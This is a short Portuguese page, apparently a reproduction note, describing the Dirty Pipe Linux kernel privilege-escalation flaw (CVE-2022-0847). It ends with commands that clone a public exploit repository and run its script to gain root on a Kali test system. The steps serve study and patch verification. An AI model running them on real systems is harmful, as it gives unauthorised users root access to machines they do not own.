
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 é uma vulnerabilidade de escalonamento de privilégio local presente no kernel do Linux 5.8 e versões posteriores. Ao explorar essa vulnerabilidade, um atacante pode sobrescrever dados em qualquer arquivo legível, elevando assim usuários com privilégios comuns ao root privilegiado. O princípio da vulnerabilidade CVE-2022-0847 é semelhante ao da vulnerabilidade Dirty Cow (CVE-2016-5195), mas é mais fácil de explorar. O autor da vulnerabilidade a batizou de "Dirty Pipe".
Reprodução simples do CVE-2022-0847
Endereço original do artigo divulgado: https://dirtypipe.cm4all.com/
Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
gcc
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
